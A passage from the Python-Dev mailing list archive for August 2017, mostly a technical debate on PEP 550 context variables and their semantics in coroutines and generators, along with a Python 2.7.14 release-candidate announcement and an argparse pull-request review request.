You've just reduced the cache hit rate too, because the cache gets invalidated on every push/pop. Presumably you'd optimize this to skip invalidating if the LC that gets pushed/popped is empty, so this isn't as catastrophic as it might initially look, but you still have to invalidate all the cached variables every time any variable gets touched and then you return from a function. Which might happen quite a bit if, for example, using timeouts involves touching the LC :-). -n -- Nathaniel J. Smith -- https://vorpus.org From benjamin at python.org Sat Aug 26 23:50:17 2017 From: benjamin at python.org (Benjamin Peterson) Date: Sat, 26 Aug 2017 20:50:17 -0700 Subject: [Python-Dev] [RELEASE] Python 2.7.14 release candidate 1 Message-ID: <1503805817.1808037.1086183896.0651D469@webmail.messagingengine.com> I'm happy to announce the immediate availability of Python 2.7.14 release candidate 1, a testing release for the latest bugfix release in the Python 2.7 series. Downloads of source code and binaries are at https://www.python.org/downloads/release/python-2714rc1/ Please consider testing the release with your libraries and applications and reporting any bugs to https://bugs.python.org A final release is expected in 3 weeks. Regards, Benjamin 2.7 release manager (on behalf of 2.7's contributors) From stefan at bytereef.org Sun Aug 27 06:08:09 2017 From: stefan at bytereef.org (Stefan Krah) Date: Sun, 27 Aug 2017 12:08:09 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <2322879.hcVsH781ou@klinga.prans.org> Message-ID: <20170827100809.GA2644@bytereef.org> On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: > On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: > > What we are talking about here is variable scope leaking up the call > > stack. I think this is a bad pattern. For decimal context-like uses > > of the EC you should always use a context manager. For uses like Web > > request locals, you always have a top function that sets the context > > vars. > > It's perfectly reasonable to have a script where you call > decimal.setcontext or np.seterr somewhere at the top to set the > defaults for the rest of the script. +100. The only thing that makes sense for decimal is to change localcontext() to be automatically async-safe while preserving the rest of the semantics. Stefan Krah From stefan at bytereef.org Sun Aug 27 06:39:42 2017 From: stefan at bytereef.org (Stefan Krah) Date: Sun, 27 Aug 2017 12:39:42 +0200 Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance In-Reply-To: References: <20170826114558.GA2649@bytereef.org> Message-ID: <20170827103942.GA2643@bytereef.org> On Sat, Aug 26, 2017 at 12:21:44PM -0400, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 7:45 AM, Stefan Krah wrote: > >> This generic caching approach is similar to what the current C > >> implementation of ``decimal`` does to cache the current decimal > >> context, and has similar performance characteristics. > > > > I think it'll work, but can we agree on hard numbers like max 2% slowdown > > for the non-threaded case and 4% for applications that only use threads? > > I'd be *very* surprised if we see any noticeable slowdown at all. The > way ContextVars will implement caching is very similar to the trick > you use now. I'd also be surprised, but what do we do if the PEP is accepted and for some yet unknown reason the implementation turns out to be 12-15% slower?
The slowdown related to the module-state/heap-type PEPs wasn't immediately obvious either; it would be nice to have actual figures before the PEP is accepted. Stefan Krah From yselivanov.ml at gmail.com Sun Aug 27 11:19:20 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sun, 27 Aug 2017 11:19:20 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170827100809.GA2644@bytereef.org> References: <2322879.hcVsH781ou@klinga.prans.org> <20170827100809.GA2644@bytereef.org> Message-ID: On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: >> On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: >> > What we are talking about here is variable scope leaking up the call >> > stack. I think this is a bad pattern. For decimal context-like uses >> > of the EC you should always use a context manager. For uses like Web >> > request locals, you always have a top function that sets the context >> > vars. >> >> It's perfectly reasonable to have a script where you call >> decimal.setcontext or np.seterr somewhere at the top to set the >> defaults for the rest of the script. > > +100. The only thing that makes sense for decimal is to change localcontext() > to be automatically async-safe while preserving the rest of the semantics. TBH Nathaniel's argument isn't entirely correct. With the semantics defined in PEP 550 v4, you can still set the decimal context at the top of your file, in your async functions etc. This will work: decimal.setcontext(ctx) def foo(): # use decimal with context=ctx and this: def foo(): decimal.setcontext(ctx) # use decimal with context=ctx and this: def bar(): # use decimal with context=ctx def foo(): decimal.setcontext(ctx) bar() and this: def bar(): decimal.setcontext(ctx) def foo(): bar() # use decimal with context=ctx and this: decimal.setcontext(ctx) async def foo(): # use decimal with context=ctx and this: async def bar(): # use decimal with context=ctx async def foo(): decimal.setcontext(ctx) await bar() The only thing that will not work is this (ex1): async def bar(): decimal.setcontext(ctx) async def foo(): await bar() # use decimal with context=ctx The reason why this one example worked in PEP 550 v3 and doesn't work in v4 is that we want to avoid random code breakage if you wrap your coroutine in a task, like here (ex2): async def bar(): decimal.setcontext(ctx) async def foo(): await wait_for(bar(), 1) # use decimal with context=ctx We want (ex1) and (ex2) to work the same way always. That's the only difference in semantics between v3 and v4, and it's the only sane one, because implicit task creation is an extremely subtle detail that most users aren't aware of. We can't have semantics that let you easily break your code by adding a timeout in one await. Speaking of (ex1), there's an example that didn't work in any PEP 550 version: def bar(): decimal.setcontext(ctx) yield async def foo(): list(bar()) # use decimal with context=ctx In the above code, the bar() generator sets some decimal context, and it will not leak outside of it. These semantics are one of PEP 550's goals. The last change just unifies these semantics for coroutines, generators, and asynchronous generators, which is a good thing. Yury From jimjjewett at gmail.com Sun Aug 27 11:51:43 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Sun, 27 Aug 2017 11:51:43 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: I think there is general consensus that this should go in a module other than sys.
(At least a submodule.) The specific names are still To Be Determined, but I suspect seeing the functions and objects as part of a named module will affect what works. So I am requesting that the next iteration just pick a module name, and let us see how that looks. E.g import dynscopevars user=dynscopevars.Var ("username") myscope=dynscopevars.get_current_scope() childscope=dynscopevars.Scope (parent=myscope,user="bob") -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From jimjjewett at gmail.com Sun Aug 27 12:00:51 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Sun, 27 Aug 2017 12:00:51 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: Does setting an ImplicitScopeVar to None set the value to None, or just remove it? If it removes it, does that effectively unmask a previously masked value? If it really sets to None, then is there a way to explicitly unmask previously masked values? Perhaps the initial constructor should require an initial value (defaulting to None) and the docs should give examples both for using a sensible default value and for using a special "unset" marker. -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From chris.jerdonek at gmail.com Sun Aug 27 14:02:50 2017 From: chris.jerdonek at gmail.com (Chris Jerdonek) Date: Sun, 27 Aug 2017 18:02:50 +0000 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: Hi Jim, it seems like each time you reply you change the subject line and start a new thread. Very few others are doing this (e.g. Yury when releasing a new version). Would it be possible for you to preserve the threading like others? --Chris On Sun, Aug 27, 2017 at 9:08 AM Jim J. Jewett wrote: > Does setting an ImplicitScopeVar to None set the value to None, or just > remove it? > > If it removes it, does that effectively unmask a previously masked value? > > If it really sets to None, then is there a way to explicitly unmask > previously masked values? > > Perhaps the initial constructor should require an initial value > (defaulting to None) and the docs should give examples both for using a > sensible default value and for using a special "unset" marker. > > -jJ > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/chris.jerdonek%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ethan at stoneleaf.us Sun Aug 27 15:12:00 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sun, 27 Aug 2017 12:12:00 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: <59A31980.5040302@stoneleaf.us> On 08/27/2017 11:02 AM, Chris Jerdonek wrote: > Hi Jim, it seems like each time you reply you change the subject line and start a new thread. Very few others are doing > this (e.g. Yury when releasing a new version). Would it be possible for you to preserve the threading like others? I must admit I'm torn here: on the one hand, having all the discussion in a single thread keeps the conversation in one place; on the other hand, having separate threads for very specific questions makes it easier to focus on the parts one is interested in without being overwhelmed by the volume. So while I'm okay either way, I do appreciate Jim trying to have focused threads. 
-- ~Ethan~ From njs at pobox.com Sun Aug 27 16:01:45 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sun, 27 Aug 2017 13:01:45 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: I believe that the current status is: - assigning None isn't treated specially -- it does mask any underlying values (which I think is what we want) - there is currently no way to "unmask" - but it's generally agreed that there should be a way to do that, at least in some cases, to handle the save/restore issue I raised. It's just that Yury & Elvis wanted to deal with restructuring the PEP first before doing more work on the API details. -n On Aug 27, 2017 9:08 AM, "Jim J. Jewett" wrote: > Does setting an ImplicitScopeVar to None set the value to None, or just > remove it? > > If it removes it, does that effectively unmask a previously masked value? > > If it really sets to None, then is there a way to explicitly unmask > previously masked values? > > Perhaps the initial constructor should require an initial value > (defaulting to None) and the docs should give examples both for using a > sensible default value and for using a special "unset" marker. > > -jJ > > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > njs%40pobox.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From songofacandy at gmail.com Mon Aug 28 02:49:17 2017 From: songofacandy at gmail.com (INADA Naoki) Date: Mon, 28 Aug 2017 15:49:17 +0900 Subject: [Python-Dev] PEP 442 undocumented C API functions In-Reply-To: <1503729060.5586.5.camel@iki.fi> References: <1503729060.5586.5.camel@iki.fi> Message-ID: Hi, thanks for your report. > As far as I understand, if you have a custom tp_dealloc, you *have* to > call PyObject_CallFinalizerFromDealloc in order to get your tp_finalize > called. Is this correct? Sorry, I'm not an expert on the object finalization process. But if my understanding is correct, you're almost right. When a type has a custom *tp_finalize*, it has to call `PyObject_CallFinalizerFromDealloc`. And to allow subclassing, it should be like this: https://github.com/python/cpython/blob/ed94a8b2851914bcda3a77b28b25517b8baa91e6/Modules/_asynciomodule.c#L1836-L1849 > However, since the necessary functions are undocumented, it's unclear > if they were intended to be public Python API functions. So are they > actually public functions that 3rd party extensions can call? > If not, how is tp_finalize supposed to be used? While I don't want tp_finalize to be used widely (like `__del__`), I agree with you. But I'm not a good English writer. Contribution is welcome. Regards, INADA Naoki From stefan at bytereef.org Mon Aug 28 07:19:03 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 13:19:03 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <20170828111903.GA3032@bytereef.org> On Sun, Aug 27, 2017 at 11:19:20AM -0400, Yury Selivanov wrote: > On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: > > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: > >> It's perfectly reasonable to have a script where you call > >> decimal.setcontext or np.seterr somewhere at the top to set the > >> defaults for the rest of the script. > > > > +100.
> > The only thing that makes sense for decimal is to change localcontext() > > to be automatically async-safe while preserving the rest of the semantics. > > TBH Nathaniel's argument isn't entirely correct. > > With the semantics defined in PEP 550 v4, you can still set the decimal > context at the top of your file, in your async functions etc. > > and this: > > def bar(): > decimal.setcontext(ctx) > > def foo(): > bar() > # use decimal with context=ctx Okay, so if I understand this correctly we actually will not have dynamic scoping for regular functions: bar() has returned, so the new context would not be found on the stack with proper dynamic scoping. > and this: > > async def bar(): > # use decimal with context=ctx > > async def foo(): > decimal.setcontext(ctx) > await bar() > > The only thing that will not work is this (ex1): > > async def bar(): > decimal.setcontext(ctx) > > async def foo(): > await bar() > # use decimal with context=ctx Here we do have dynamic scoping. > Speaking of (ex1), there's an example that didn't work in any PEP 550 version: > > def bar(): > decimal.setcontext(ctx) > yield > > async def foo(): > list(bar()) > # use decimal with context=ctx What about this? async def bar(): setcontext(Context(prec=1)) for i in range(10): await asyncio.sleep(1) yield i async def foo(): async for i in bar(): # ctx.prec=1? print(Decimal(100) / 3) I'm searching for some abstract model to reason about the scopes. Stefan Krah From jsbueno at python.org.br Mon Aug 28 10:17:46 2017 From: jsbueno at python.org.br (Joao S. O. Bueno) Date: Mon, 28 Aug 2017 11:17:46 -0300 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: Well, this talk may be a bit of bike-shedding, but +1 for a separate module/submodule. And a full -1 for something named "dynscopevars". That word is unreadable, barely mnemonic, and just plain "ugly" (I know that this is subjective, but it is just that :-)). Why not just "execution_context" or "sys.execution_context"? "from execution_context import Var, lookup, set, LogicalContext, run_with" On 27 August 2017 at 12:51, Jim J. Jewett wrote: > I think there is general consensus that this should go in a module other > than sys. (At least a submodule.) > > The specific names are still To Be Determined, but I suspect seeing the > functions and objects as part of a named module will affect what works. > > So I am requesting that the next iteration just pick a module name, and > let us see how that looks. E.g > > import dynscopevars > > user=dynscopevars.Var ("username") > > myscope=dynscopevars.get_current_scope() > > childscope=dynscopevars.Scope (parent=myscope,user="bob") > > > -jJ > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > jsbueno%40python.org.br > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From robert at shajil.de Mon Aug 28 03:42:55 2017 From: robert at shajil.de (Robert Schindler) Date: Mon, 28 Aug 2017 09:42:55 +0200 Subject: [Python-Dev] [bpo-30421]: Pull request review Message-ID: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Hello, In May, I submitted a pull request that extends the functionality of argparse.ArgumentParser. To do so, I followed the steps described in the developers guide. According to [1], I already pinged on GitHub but got no response. The next step seems to be writing to this list.
I know that nobody is paid for reviewing submissions, but maybe it just got overlooked? You can find the pull request at [2]. Thanks in advance for any feedback. Best regards Robert [1] https://docs.python.org/devguide/pullrequest.html#reviewing [2] https://github.com/python/cpython/pull/1698 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: not available URL: From yselivanov.ml at gmail.com Mon Aug 28 11:23:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:23:12 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828111903.GA3032@bytereef.org> References: <20170828111903.GA3032@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 7:19 AM, Stefan Krah wrote: > On Sun, Aug 27, 2017 at 11:19:20AM -0400, Yury Selivanov wrote: >> On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: >> > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: >> >> It's perfectly reasonable to have a script where you call >> >> decimal.setcontext or np.seterr somewhere at the top to set the >> >> defaults for the rest of the script. >> > >> > +100. The only thing that makes sense for decimal is to change localcontext() >> > to be automatically async-safe while preserving the rest of the semantics. >> >> TBH Nathaniel's argument isn't entirely correct. >> >> With the semantics defined in PEP 550 v4, you can still set the decimal >> context at the top of your file, in your async functions etc. >> >> and this: >> >> def bar(): >> decimal.setcontext(ctx) >> >> def foo(): >> bar() >> # use decimal with context=ctx > > Okay, so if I understand this correctly we actually will not have dynamic > scoping for regular functions: bar() has returned, so the new context > would not be found on the stack with proper dynamic scoping. Correct. Although I would avoid associating PEP 550 with dynamic scoping entirely, as we never intended to implement it. [..] > What about this? > > async def bar(): > setcontext(Context(prec=1)) > for i in range(10): > await asyncio.sleep(1) > yield i > > async def foo(): > async for i in bar(): > # ctx.prec=1? > print(Decimal(100) / 3) > > > > I'm searching for some abstract model to reason about the scopes. Whatever is set in coroutines, generators, and async generators does not leak out. In the above example, "prec=1" will only be set inside "bar()", and "foo()" will not see that. (The same will happen for a regular function and a generator.) Yury From ethan at stoneleaf.us Mon Aug 28 11:26:55 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Mon, 28 Aug 2017 08:26:55 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828111903.GA3032@bytereef.org> References: <20170828111903.GA3032@bytereef.org> Message-ID: <59A4363F.8040003@stoneleaf.us> On 08/28/2017 04:19 AM, Stefan Krah wrote: > What about this? > > async def bar(): > setcontext(Context(prec=1)) > for i in range(10): > await asyncio.sleep(1) > yield i > > async def foo(): > async for i in bar(): > # ctx.prec=1? > print(Decimal(100) / 3) If I understand correctly, ctx.prec is whatever the default is, because foo comes before bar on the stack, and after the current value for i is grabbed bar is no longer executing, and therefore no longer on the stack. I hope I'm right.
;) -- ~Ethan~ From yselivanov.ml at gmail.com Mon Aug 28 11:26:51 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:26:51 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <67011615-0c66-b610-6887-052ff65c97f1@email.de> References: <67011615-0c66-b610-6887-052ff65c97f1@email.de> Message-ID: On Sat, Aug 26, 2017 at 4:45 PM, francismb wrote: [..] > Is it by design that the execution context for new threads is empty, or > should it be possible to set it to some initial value? Like e.g.: > > var = new_context_var('init') > > def sub(): > assert var.lookup() == 'init' > var.set('sub') > > def main(): > var.set('main') > > thread = threading.Thread(target=sub) > thread.start() > thread.join() > > assert var.lookup() == 'main' Yes, it's by design. With PEP 550 APIs it's easy to subclass threading.Thread or concurrent.futures.ThreadPoolExecutor to make them capture the EC. Yury From yselivanov.ml at gmail.com Mon Aug 28 11:29:41 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:29:41 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A4363F.8040003@stoneleaf.us> References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 11:26 AM, Ethan Furman wrote: > On 08/28/2017 04:19 AM, Stefan Krah wrote: > >> What about this? >> >> async def bar(): >> setcontext(Context(prec=1)) >> for i in range(10): >> await asyncio.sleep(1) >> yield i >> >> async def foo(): >> async for i in bar(): >> # ctx.prec=1? >> print(Decimal(100) / 3) > > > If I understand correctly, ctx.prec is whatever the default is, because foo > comes before bar on the stack, and after the current value for i is grabbed > bar is no longer executing, and therefore no longer on the stack. I hope > I'm right. ;) You're right! Yury From yselivanov.ml at gmail.com Mon Aug 28 11:50:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:50:04 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: On Sun, Aug 27, 2017 at 4:01 PM, Nathaniel Smith wrote: > I believe that the current status is: > > - assigning None isn't treated specially -- it does mask any underlying > values (which I think is what we want) Correct. > > - there is currently no way to "unmask" > > - but it's generally agreed that there should be a way to do that, at least > in some cases, to handle the save/restore issue I raised. It's just that > Yury & Elvis wanted to deal with restructuring the PEP first before doing > more work on the API details. Yes. I think it's a good time to start a discussion about this; I can list a couple of ideas here. For checking if a context variable has a value in the topmost LC, we can add two new keyword arguments to the "ContextVar.lookup()" method: ContextVar.lookup(*, default=None, topmost=False) If `topmost` is set to `True`, `lookup` will only check the topmost LC. For deleting a value from the topmost LC we can add a new "ContextVar.delete()" method.
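For example, with those two additions, the save/restore pattern from Nathaniel's use case could be written as follows (a sketch against this proposed API, so the exact names and signatures are tentative):

    _missing = object()

    def run_with_value(var, value, func, *args, **kwargs):
        # Save only what is in the topmost LC, so that restoring
        # cannot accidentally mask values set in outer LCs.
        saved = var.lookup(default=_missing, topmost=True)
        var.set(value)
        try:
            return func(*args, **kwargs)
        finally:
            if saved is _missing:
                var.delete()   # unmask the outer value again
            else:
                var.set(saved)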
Yury From stefan at bytereef.org Mon Aug 28 11:52:15 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 17:52:15 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> Message-ID: <20170828155215.GA3763@bytereef.org> On Mon, Aug 28, 2017 at 11:23:12AM -0400, Yury Selivanov wrote: [..] > But the state "leaks in" as per your previous example: > > async def bar(): > # use decimal with context=ctx > > async def foo(): > decimal.setcontext(ctx) > await bar() > > > IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, > as I see it, there's still some mixture between dynamic scoping and CLS > because in this example bar() is allowed to search the stack. The whole proposal will then be mostly useless. If we forget about dynamic scoping (I don't know why it's being brought up all the time, TBH; nobody uses it, almost no language implements it), the current proposal is well balanced and solves multiple problems. Three points listed in the rationale section: * Context managers like decimal contexts, numpy.errstate, and warnings.catch_warnings. * Request-related data, such as security tokens and request data in web applications, language context for gettext etc. * Profiling, tracing, and logging in large code bases. Two of them require context propagation *down* the stack of coroutines. What the latest PEP 550 revision does is prohibit context propagation *up* the stack in coroutines (it's a requirement to make async code refactorable and easy to reason about). Propagation of context "up" the stack in regular code is allowed with threading.local(), and everybody is used to it. Doing that for coroutines doesn't work, because of the reasons covered here: https://www.python.org/dev/peps/pep-0550/#coroutines-and-asynchronous-tasks Yury From yselivanov.ml at gmail.com Mon Aug 28 12:16:36 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 12:16:36 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 11:53 AM, Ivan Levkivskyi wrote: > A question appeared here about a simple mental model for PEP 550. > It looks much clearer now than in the first version, but I still would like > to clarify: can one say that PEP 550 just provides a more fine-grained version > of threading.local(), that works not only per thread, but even per coroutine > within the same thread? Simple model: 1. Values in the EC propagate down the call stack for both synchronous and asynchronous code. 2. For regular functions/code the EC works the same way as threading.local(). Yury From barry at python.org Mon Aug 28 12:26:54 2017 From: barry at python.org (Barry Warsaw) Date: Mon, 28 Aug 2017 12:26:54 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> On Aug 28, 2017, at 11:50, Yury Selivanov wrote: > For checking if a context variable has a value in the topmost LC, we > can add two new keyword arguments to the "ContextVar.lookup()" method: > > ContextVar.lookup(*, default=None, topmost=False) > > If `topmost` is set to `True`, `lookup` will only check the topmost LC. > > For deleting a value from the topmost LC we can add a new > "ContextVar.delete()" method. +1 -Barry -------------- next part -------------- A non-text attachment was scrubbed...
URL: From yselivanov.ml at gmail.com Mon Aug 28 12:12:00 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 12:12:00 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828155215.GA3763@bytereef.org> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 11:52 AM, Stefan Krah wrote: [..] > But the state "leaks in" as per your previous example: > > async def bar(): > # use decimal with context=ctx > > async def foo(): > decimal.setcontext(ctx) > await bar() > > > IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, > as I see it, there's still some mixture between dynamic scoping and CLS > because it this example bar() is allowed to search the stack. The whole proposal will then be mostly useless. If we forget about the dynamic scoping (I don't know why it's being brought up all the time, TBH; nobody uses it, almost no language implements it) the current proposal is well balanced and solves multiple problems. Three points listed in the rationale section: * Context managers like decimal contexts, numpy.errstate, and warnings.catch_warnings. * Request-related data, such as security tokens and request data in web applications, language context for gettext etc. * Profiling, tracing, and logging in large code bases. Two of them require context propagation *down* the stack of coroutines. What latest PEP 550 revision does, it prohibits context propagation *up* the stack in coroutines (it's a requirement to make async code refactorable and easy to reason about). Propagation of context "up" the stack in regular code is allowed with threading.local(), and everybody is used to it. Doing that for coroutines doesn't work, because of the reasons covered here: https://www.python.org/dev/peps/pep-0550/#coroutines-and-asynchronous-tasks Yury From yselivanov.ml at gmail.com Mon Aug 28 12:16:36 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 12:16:36 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 11:53 AM, Ivan Levkivskyi wrote: > A question appeared here about a simple mental model for PEP 550. > It looks much clearer now, than in the first version, but I still would like > to clarify: can one say that PEP 550 just provides more fine-grained version > of threading.local(), that works not only per thread, but even per coroutine > within the same thread? Simple model: 1. Values in the EC propagate down the call stack for both synchronous and asynchronous code. 2. For regular functions/code EC works the same way as threading.local(). Yury From barry at python.org Mon Aug 28 12:26:54 2017 From: barry at python.org (Barry Warsaw) Date: Mon, 28 Aug 2017 12:26:54 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> On Aug 28, 2017, at 11:50, Yury Selivanov wrote: > For checking if a context variable has a value in the topmost LC, we > can add two new keyword arguments to the "ContextVar.lookup()" method: > > ContextVar.lookup(*, default=None, topmost=False) > > If `topmost` is set to `True`, `lookup` will only check the topmost LC. > > For deleting a value from the topmost LC we can add a new > "ContextVar.delete()" method. +1 -Barry -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: Message signed with OpenPGP
URL: 

From ethan at stoneleaf.us  Mon Aug 28 12:43:35 2017
From: ethan at stoneleaf.us (Ethan Furman)
Date: Mon, 28 Aug 2017 09:43:35 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org>
Message-ID: <59A44837.2010308@stoneleaf.us>

On 08/28/2017 09:12 AM, Yury Selivanov wrote:

> If we forget about dynamic scoping (I don't know why it's being brought
> up all the time, TBH; nobody uses it, almost no language implements it)

Probably because it's not lexical scoping, and possibly because it's
possible for a function to be running with one EC on one call, and a
different EC on the next -- hence, the EC it's using is dynamically
determined.

It seems to me the biggest difference between "true" dynamic scoping and
what PEP 550 implements is the granularity: i.e. not every single
function gets its own LC, just a select few: generators, async stuff,
etc.

Am I right? (No CS degree here.) If not, what are the differences?

--
~Ethan~

From tjreedy at udel.edu  Mon Aug 28 12:46:05 2017
From: tjreedy at udel.edu (Terry Reedy)
Date: Mon, 28 Aug 2017 12:46:05 -0400
Subject: [Python-Dev] [bpo-30421]: Pull request review
In-Reply-To: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com>
References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com>
Message-ID: 

On 8/28/2017 3:42 AM, Robert Schindler wrote:
> Hello,
>
> In May, I submitted a pull request that extends the functionality of
> argparse.ArgumentParser.

The argparse maintainer, bethard (Steven Bethard), was not added to the
nosy list. And he does not seem to have been active lately -- his bpo
profile does not list a github name.

> To do so, I followed the steps described in the developers guide.
>
> According to [1], I already pinged at GitHub but got no response. The
> next step seems to be writing to this list.
>
> I know that nobody is paid for reviewing submissions, but maybe it just
> got overlooked?
>
> You can find the pull request at [2].
>
> [1] https://docs.python.org/devguide/pullrequest.html#reviewing
> [2] https://github.com/python/cpython/pull/1698

Some core developer has to decide if the new feature should be added,
and if so, what the API should be. If Steven is not doing that, I don't
know who will. It is possible that the current design is intentional,
rather than an oversight. It does not make too much sense to review the
implementation (the PR) until the design decisions are made. In this
case, the PR adds a feature not discussed on the bpo issue.

--
Terry Jan Reedy

From yselivanov.ml at gmail.com  Mon Aug 28 13:04:15 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Mon, 28 Aug 2017 13:04:15 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A44837.2010308@stoneleaf.us>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <59A44837.2010308@stoneleaf.us>
Message-ID: 

On Mon, Aug 28, 2017 at 12:43 PM, Ethan Furman wrote:
> On 08/28/2017 09:12 AM, Yury Selivanov wrote:
>
>> If we forget about dynamic scoping (I don't know why it's being brought up
>> all the time, TBH; nobody uses it, almost no language implements it)
>
> Probably because it's not lexical scoping, and possibly because it's
> possible for a function to be running with one EC on one call, and a
> different EC on the next -- hence, the EC it's using is dynamically
> determined.
> > It seems to me the biggest difference between "true" dynamic scoping and > what PEP 550 implements is the granularity: i.e. not every single function > gets it's own LC, just a select few: generators, async stuff, etc. > > Am I right? (No CS degree here.) If not, what are the differences? Sounds right to me. If PEP 550 was about adding true dynamic scoping, we couldn't use it as a suitable context management solution for libraries like decimal. For example, converting decimal/numpy to use new APIs would be a totally backwards-incompatible change. I still prefer using a "better TLS" analogy for PEP 550. We'll likely add a section summarizing differences between threading.local() and new APIs (as suggested by Eric Snow). Yury From stefan at bytereef.org Mon Aug 28 13:33:27 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 19:33:27 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> Message-ID: <20170828173327.GA2671@bytereef.org> On Mon, Aug 28, 2017 at 12:12:00PM -0400, Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 11:52 AM, Stefan Krah wrote: > [..] > > But the state "leaks in" as per your previous example: > > > > async def bar(): > > # use decimal with context=ctx > > > > async def foo(): > > decimal.setcontext(ctx) > > await bar() > > > > > > IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, > > as I see it, there's still some mixture between dynamic scoping and CLS > > because it this example bar() is allowed to search the stack. > > The whole proposal will then be mostly useless. If we forget about > the dynamic scoping (I don't know why it's being brought up all the > time, TBH; nobody uses it, almost no language implements it) Because a) it was brought up by proponents of the PEP early on python-ideas, b) people desperately want a mental model of what is going on. :-) > * Context managers like decimal 